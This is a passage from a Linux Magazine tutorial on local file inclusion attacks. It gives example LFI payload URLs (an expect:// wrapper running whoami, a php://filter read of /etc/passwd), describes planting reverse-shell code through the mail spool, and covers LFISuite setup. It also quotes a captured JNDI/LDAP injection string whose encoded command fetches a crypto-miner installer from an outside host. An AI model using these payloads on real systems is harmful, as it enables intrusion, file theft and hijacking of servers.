Picking locks with local file inclusion

Other LFI Attacks

There are several other ways of achieving local file inclusion. Look online for a nicely constructed cheat sheet [7].

For example, the expect wrapper in PHP [8] is a useful attack vector. Loosely written out, the format of an expect wrapper attack looks like the following:

index.php?page=expect://whoami

In this case, I'm running the whoami command through the expect wrapper.

PHP also has a vulnerability relating to the filter wrapper. A URL might look like the following:

index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

There are several more examples in the cheat sheet link, but another one that piqued my interest is to email the target machine a reverse shell! Even if the mail server is not associated with DNS, but an SMTP service is dutifully listening, you can email nefarious data to the www-data user. The LFI part of the puzzle is then reading the internal email text file (for example /var/spool/mail/www-data), which would hold the reverse shell code.

If you are interested in automating the search for possible LFI targets, you could try the fantastic tool called LFISuite [9]. I needed to create a virtual environment in Python to get it running. The following commands worked for me, but you might need to tweak them and do a little bit of research in order to get them working. The commands are as follows (assuming you have installed pip):

$ git clone https://github.com/D35m0nd142/LFISuite.git
$ cd LFISuite
$ virtualenv -p /usr/bin/python2.7 env_name
$ . env_name/bin/activate
$ pip install requests # test the environment with the "pip" package manager
$ python lfisuite.py

Figure 2 shows the LFISuite, with some excellent ASCII art.

Figure 2: LFISuite starting up, with understated aplomb.

If you look at some of the options available (under the Exploiter menu option), you will see some familiar information, as shown in Figure 3.

Figure 3: Some old familiars in the Exploiter menu.

Although a little long in the tooth (the GitHub hasn't been updated for five years or so), the core of LFISuite is still extremely useful. I would recommend exercising a degree of patience and walking through the many options against a test machine. You will see lots of ../../../ URLs in the output, and you'll be able to gain confidence in the findings with some practice. Use the Auto-Hack option with a level of care, as you can imagine!

Conclusion

This article took a close look at local file inclusion attacks. Understanding how these attacks work will help you understand how to prepare for them.

One important warning about the techniques described in this article is that you need to be very careful when opening up network ports. During testing, I was momentarily distracted by the fact that my listener terminal filled up with text. At a glance, it looked like an attacker was looking for a Tomcat vulnerability. Listing 8 shows a heavily abbreviated snippet.

Listing 8

Tomcat Bypass

Authentication: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://129.151.XXX.XXX:1389/TomcatBypass/Command/Base64/
Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1c
F9jM3Bvb2xfb?

With a bit of digging, I was able to extract the following URL: https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh. This looks like a Crypto Mining installer script. See the GitHub site for the XMRig script if you are interested [10].

I mention this to remind you to be careful when opening up network ports!

I would be remiss not to give you some pointers about writing secure code to help mitigate the effects of some LFI threats. You'll find a relatively concise introduction at the Acunetix website [11]. Stay vigilant.

The Author

Chris Binnie is a Cloud Native Security consultant and co-author of the book Cloud Native Security: https://www.amazon.com/Cloud-Native-Security-Chris-Binnie/dp/1119782236

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Reverse Shells

    Firewalls block shell access from outside the network. But what if the shell is launched from the inside?

  • Compromising WordPress

    WordPress is an incredibly popular tool for building websites, and don't think the attackers haven't noticed. We'll show you what to watch for.

  • New Trojan Attacks Linux Servers

    The Xnote trojan hides itself on the target system and will launch a variety of attacks on command.

  • PHP Shell and Shell in a Box

    Firewalls often block shell access for remote users on a corporate network or at an Internet cafe. Luckily, tools like PHP Shell and Shell in a Box put the shell in a browser window.

  • ShellHub

    ShellHub offers an innovative approach to remote access with minimal reconfiguration of a firewall.

comments powered by Disqus
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters

Support Our Work

Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.

Learn More

News